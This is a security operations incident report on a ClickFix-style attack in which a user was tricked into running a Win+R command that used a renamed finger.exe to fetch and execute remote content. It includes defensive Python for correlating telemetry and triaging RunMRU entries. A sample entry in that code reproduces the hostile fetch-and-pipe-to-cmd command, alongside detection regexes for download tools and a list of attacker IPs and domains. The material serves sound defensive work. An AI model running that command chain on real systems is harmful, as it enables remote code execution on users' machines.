ClickFix / KongTuke-Style User-Assisted Malware Execution

(Win+R LOLBin Chain)

On January 22, 2026, the Security Operations Center (SOC) completed an investigation into a medium-severity malware alert on an endpoint belonging to a healthcare organization.

The activity was confirmed as a user-assisted execution consistent with ClickFix-style social engineering, where a user is tricked into manually running a command via the Windows Run dialog (Win+R).

The observed behavior matched the broader KongTuke-style tradecraft documented publicly by Huntress: a multi-stage Living-off-the-Land (LOTL) chain in which each step looks benign on its own and the malicious intent only appears when the chain is correlated end-to-end.

No evidence of persistence, lateral movement, or ongoing attacker activity was identified; the impact appears isolated to the user profile on the affected device.

What Happened?

The alert originated from suspicious command execution on the endpoint. Initial triage was delayed, and the host had been rebooted before the investigation began; because a reboot discards volatile evidence (memory, running processes, live network connections), the investigation had to rely on host-level artifacts that survive a restart, such as registry keys and Prefetch files.

Forensic triage confirmed a RunMRU registry entry (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) in the impacted user's profile containing the exact command executed via Win+R. Because this key is normally populated only by commands typed into the Run dialog, it is a strong indication that the action was performed manually by the user.

The execution chain showed classic ClickFix/KongTuke overlap:

    A legitimate Windows utility (finger.exe, the built-in finger client) was copied to a temp location and renamed, so that the process name no longer matched a known LOLBin (LOTL camouflage).
    The renamed binary was executed to retrieve attacker-controlled content from a remote IP over the finger protocol (TCP port 79).
    The retrieved content was piped directly into cmd.exe for execution, forming a staged, multi-step chain in which the malicious intent becomes clear only through correlation of the individual steps.

Corroborating artifacts supported the RunMRU-confirmed sequence: UserAssist showed cmd.exe executed in the user's context, and Prefetch confirmed execution of cmd.exe and powershell.exe on the host.

This behavior aligns closely with public reporting on KongTuke campaigns (e.g., Huntress “KongTuke’s New Toy”), where users are coerced into running “fix” commands, and attackers rely on trusted system tools to avoid early-stage blocking.
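The chain above is detectable only when the individual events are joined. The following is an added example (it is not code from this report or from Huntress) of that correlation over Sysmon-style telemetry, assuming process-creation events (Event ID 1, including the PE OriginalFileName field) and network-connection events (Event ID 3) have already been parsed into dicts. The events, paths, PIDs and the IP 203.0.113.10 are constructed placeholders, not indicators from this incident. The renamed copy is caught because its OriginalFileName still reads finger.exe while the on-disk image name does not; each further link (explorer.exe to cmd.exe ancestry, outbound connection, a sibling cmd.exe fed by the pipe) raises the score.

```python
"""Correlate Sysmon-style process and network events into a Win+R LOLBin chain.

Added example, not code from the original report. Assumes events already
parsed into dicts: id 1 = process create (with the PE OriginalFileName),
id 3 = network connect. All PIDs, paths and the IP are constructed
placeholders, not indicators from the incident.
"""
from collections import defaultdict

# Illustrative set of built-in binaries that can pull remote content.
FETCH_LOLBINS = {"finger.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "mshta.exe"}

# Constructed telemetry mirroring the chain described in the report.
EVENTS = [
    {"id": 1, "pid": 1000, "ppid": 400, "image": r"C:\Windows\explorer.exe",
     "orig": "EXPLORER.EXE"},
    # Win+R hands the typed command to cmd.exe, whose parent is explorer.exe.
    {"id": 1, "pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "orig": "Cmd.Exe"},
    # The renamed copy: on-disk name svc.exe, PE OriginalFileName still finger.exe.
    {"id": 1, "pid": 2100, "ppid": 2000,
     "image": r"C:\Users\u\AppData\Local\Temp\svc.exe", "orig": "finger.exe"},
    {"id": 3, "pid": 2100, "image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
     "dst": "203.0.113.10", "dport": 79},
    # Second cmd.exe under the same parent consumes the fetched text on stdin.
    {"id": 1, "pid": 2200, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",
     "orig": "Cmd.Exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def index_events(events):
    """Split events into a PID->process map, PID->connections and parent->children."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    conns, children = defaultdict(list), defaultdict(list)
    for e in events:
        if e["id"] == 3:
            conns[e["pid"]].append(e)
    for p in procs.values():
        children[p["ppid"]].append(p)
    return procs, conns, children


def renamed_binaries(procs):
    """Processes whose on-disk name differs from the PE OriginalFileName."""
    return [p for p in procs.values()
            if p.get("orig") and basename(p["image"]) != p["orig"].lower()]


def correlate(events):
    """Score each renamed binary by how much of the Win+R LOLBin chain surrounds it."""
    procs, conns, children = index_events(events)
    findings = []
    for p in renamed_binaries(procs):
        reasons = [f"renamed binary: {basename(p['image'])} is really {p['orig']}"]
        parent = procs.get(p["ppid"])
        grand = procs.get(parent["ppid"]) if parent else None
        if parent and basename(parent["image"]) == "cmd.exe" \
                and grand and basename(grand["image"]) == "explorer.exe":
            reasons.append("explorer.exe -> cmd.exe ancestry (Win+R / Run dialog pattern)")
        if p["orig"].lower() in FETCH_LOLBINS:
            reasons.append(f"{p['orig']} is a built-in utility able to fetch remote content")
        for c in conns.get(p["pid"], []):
            reasons.append(f"outbound connection to {c['dst']}:{c['dport']} from the renamed binary")
        if parent and any(basename(s["image"]) == "cmd.exe" and s["pid"] != p["pid"]
                          for s in children[parent["pid"]]):
            reasons.append("sibling cmd.exe under the same parent (piped output executed)")
        findings.append({"pid": p["pid"], "score": len(reasons), "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"pid {f['pid']} score {f['score']}")
        for r in f["reasons"]:
            print("  -", r)
```

A renamed binary with no network activity and no cmd.exe ancestry scores 1 and can be routed to low-priority review; the full chain scores 5 on the constructed sample. The OriginalFileName comparison is the piece Windows 4688 events cannot supply, which is why Sysmon (or an EDR exposing the PE header) is assumed here.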

How Was It Addressed?

Incident Response and Containment
Following confirmation of user-assisted execution, the endpoint was network-contained to prevent any potential follow-on actions or external communication.
The affected user’s credentials were reset, access was temporarily restricted, and the device was approved for full reimage to return it to a known-good state.

DFIR Validation (Negative Evidence)
Because the reboot and the time elapsed before triage can erase transient evidence of attacker activity, the SOC also performed live-response validation to determine whether persistence or residual tooling existed.
During DFIR collection, the team gathered running processes, scheduled tasks, services, and network connections, and used a targeted artifact-collection script to extract key user-execution evidence (e.g., RunMRU, TypedPaths, HKCU Run keys, and the PowerShell PSReadLine history at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt) from user profiles for review.
No unauthorized tasks or services, anomalous processes, or suspicious network connections were observed at the time of collection, supporting the conclusion that the incident was opportunistic, non-persistent, and limited in scope. As negative evidence, this finding is bounded by the reboot: it rules out persistence mechanisms that survive a restart, not activity that ended before the host came back up.
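To show what the user-execution artifacts described above look like once collected, the following added example (not the SOC's own collection script) decodes a RunMRU export and sweeps it, together with HKCU Run values and PSReadLine history lines, for LOLBin and download-and-execute patterns. It assumes the collector hands back the RunMRU values as a value-name-to-data mapping; the MRUList value orders the slots most-recent-first and each command is stored with a trailing `\1`. All sample values are constructed placeholders, and the regex list is illustrative rather than exhaustive. The sample mirrors the incident outcome: one flagged RunMRU command and clean Run keys and history, which is the negative-evidence result the validation step is looking for.

```python
"""Decode a RunMRU export and sweep user-execution artifacts for LOLBin patterns.

Added example, not the SOC's collection script. Assumes the collector
returns RunMRU as a value-name -> data mapping; MRUList orders the slots
most-recent-first and each command carries a trailing "\\1". All sample
values are constructed placeholders, not indicators from the incident.
"""
import re

# Illustrative (not exhaustive) patterns seen in ClickFix-style commands.
PATTERNS = {
    "pipe_to_cmd": re.compile(r"\|\s*cmd(\.exe)?\b", re.I),
    "lolbin_fetch": re.compile(r"\b(finger|certutil|bitsadmin|mshta|curl)(\.exe)?\b", re.I),
    "copy_from_system32": re.compile(r"\bcopy\b.*system32", re.I),
    "temp_path": re.compile(r"%temp%|\\temp\\", re.I),
    "ps_download": re.compile(
        r"\b(iex|invoke-expression|downloadstring|irm|invoke-restmethod|frombase64string)\b"
        r"|\s-e(nc|ncodedcommand)?\s", re.I),
    "url": re.compile(r"https?://", re.I),
}

# Constructed collector output (placeholder values).
RUNMRU = {
    "MRUList": "cba",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    "c": r"cmd /c copy C:\Windows\System32\finger.exe %TEMP%\svc.exe "
         r"&& %TEMP%\svc.exe user@203.0.113.10 | cmd\1",
}
HKCU_RUN = {"OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'}
PSREADLINE = ["Get-Process", "Get-ChildItem $env:TEMP"]


def runmru_entries(values):
    """Return (slot, command) most-recent-first, with the "\\1" suffix removed."""
    entries = []
    for slot in values.get("MRUList", ""):
        data = values.get(slot)
        if data is None:          # MRUList can reference a slot that was never written
            continue
        if data.endswith("\\1"):
            data = data[:-2]
        entries.append((slot, data))
    return entries


def flags_for(text):
    return [name for name, rx in PATTERNS.items() if rx.search(text)]


def triage(runmru, run_values, history):
    """Flag RunMRU, HKCU Run and PSReadLine content; empty lists mean negative evidence."""
    return {
        "runmru": [{"slot": s, "command": c, "flags": flags_for(c)}
                   for s, c in runmru_entries(runmru)],
        "hkcu_run": [{"name": n, "command": c, "flags": f}
                     for n, c in run_values.items() if (f := flags_for(c))],
        "psreadline": [{"line": l, "flags": f} for l in history if (f := flags_for(l))],
    }


if __name__ == "__main__":
    result = triage(RUNMRU, HKCU_RUN, PSREADLINE)
    for e in result["runmru"]:
        print(f"RunMRU[{e['slot']}] {e['flags'] or 'clean'}: {e['command']}")
    print("HKCU Run findings:", result["hkcu_run"])
    print("PSReadLine findings:", result["psreadline"])
```

Every RunMRU entry is kept in the output, flagged or not, because the ordering itself is evidence: the most recent slot is the command the user typed last, and that is the value to line up against process-creation timestamps. Only the Run and PSReadLine hits are filtered, since an empty list there is the finding.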

Lessons Learned and Improvements

    Behavioral correlation beats single alerts: high-confidence detection of this class of activity depends on linking user-action artifacts (e.g., RunMRU) to process-creation and network telemetry; each step on its own (copying a system binary, a finger client connecting outbound, cmd.exe reading stdin) looks benign in isolation.
    LOTL reduces early friction for attackers: abuse of signed, built-in utilities can appear policy-compliant until the full execution chain is reconstructed.
    User awareness remains critical: ClickFix-style lures exploit urgency and trust, making training and context-aware controls essential.

Conclusion

This incident represents a confirmed user-assisted ClickFix-style execution with no evidence of persistence or spread beyond a single user profile on one device.

Containment actions were completed, credentials were reset, and reimaging was approved to fully eliminate residual risk.

The outcome reinforces that modern campaigns increasingly rely on human-in-the-loop execution and LOTL tradecraft, making correlation-driven telemetry and user-focused awareness essential.


The list of malicious IP addresses and domains found after the investigation:

IP list           Domain list
199.217.98.108    ieeikebjanfiemm[.]top
64.52.80.153      8znu232kmuenkxm[.]top
146.112.47.62     fyvw2oiv[.]top
146.112.61.107

The SOCcare project is co-funded by the European Union, alongside our collaborators University POLITEHNICA of Bucharest and NRD Cyber Security, and supported by the European Cybersecurity Competence Centre (ECCC) under Grant Agreement No. a101145843.